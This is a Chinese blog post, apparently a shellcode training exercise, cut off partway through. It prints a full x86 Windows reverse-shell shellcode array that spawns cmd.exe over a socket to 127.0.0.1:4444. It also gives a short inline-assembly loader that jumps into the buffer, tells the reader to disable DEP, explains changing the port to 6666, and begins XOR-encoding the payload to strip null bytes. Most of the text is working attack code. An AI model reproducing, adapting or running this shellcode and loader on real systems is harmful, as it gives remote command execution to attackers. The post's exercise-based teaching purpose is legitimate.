shellcode基础(1)

最新推荐文章于 2023-12-13 13:46:09 发布

Parle

最新推荐文章于 2023-12-13 13:46:09 发布

阅读量2.7k

点赞数

分类专栏： C/C++ 二进制逆向文章标签：二进制 shell x86

本文链接：https://blog.csdn.net/GVFDBDF/article/details/48500971

版权

本文介绍了如何在C++中加载并执行x86二进制shellcode，通过Visual Studio进行动态调试，理解其汇编代码含义。同时，讲解了如何修改shellcode以连接到不同的端口，并解决shellcode中0x00导致的问题，采用异或编码解码方法确保其正常执行。

摘要由CSDN通过智能技术生成

题目：
已知以下是我写得一串x86二进制指令码，可以将其加载并运行。
char buff[]=
{"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x68\x7f\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56"
"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3"
"\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24"
"\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56"
"\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"
"\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xe0"
"\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80"
"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" };
任务一：使用visual studio，将此shellcode插入你的c++代码中，编写此shellcode加载代码，跳转到buffer中并执行。
       提示：代码行数不超过5行。
需要的工具：visual studio 2010或以后的版本~~ C++，创建工程后请关闭DEP，请自行百度DEP是什么，如何关闭。
任务二：将其运行起来并动态调试，将其汇编形态代码抽取出来，理解每一行汇编代码的含义，修改shellcode，使其连接的端口变为6666。
       提示：visual studio调试有反汇编窗口。
任务三：修改shellcode，本shellcode中含有0x00,请使用一定的编码方法使shellcode不含0x00，在shellcode前增加解码头，从而使shellcode可以正常执行。
       提示：参考《0day安全》第三章

第一问：

直接加载shellcode的地址并运行

void main()
{
     __asm{
          lea eax, buff
          push eax
          ret
    }
}

将buff的地址放入eax，然后将eax压入栈顶，ret指令会弹出当前栈顶元素并跳转至此地址执行，则shellcode被执行

第二问：

这个shellcode是开启本机的4444端口并反弹一个cmd窗口，可以用nc监听本机的6666端口，然后运行第一问可以看到效果。

第二问直接将红色标准的4444的十六进制改为6666的十六进制就可以了。汇编代码后面附上。可以在OD中查看shellcode的执行过程。

第三问：

shellcode编解码的问题。

首先对shellcode进行异或编码，解决shellcode中包含0x00的问题，可以采用遍历，寻找一个可异或的key值

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char buff[]=
{"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x68\x7f\x00\x00\x01\x68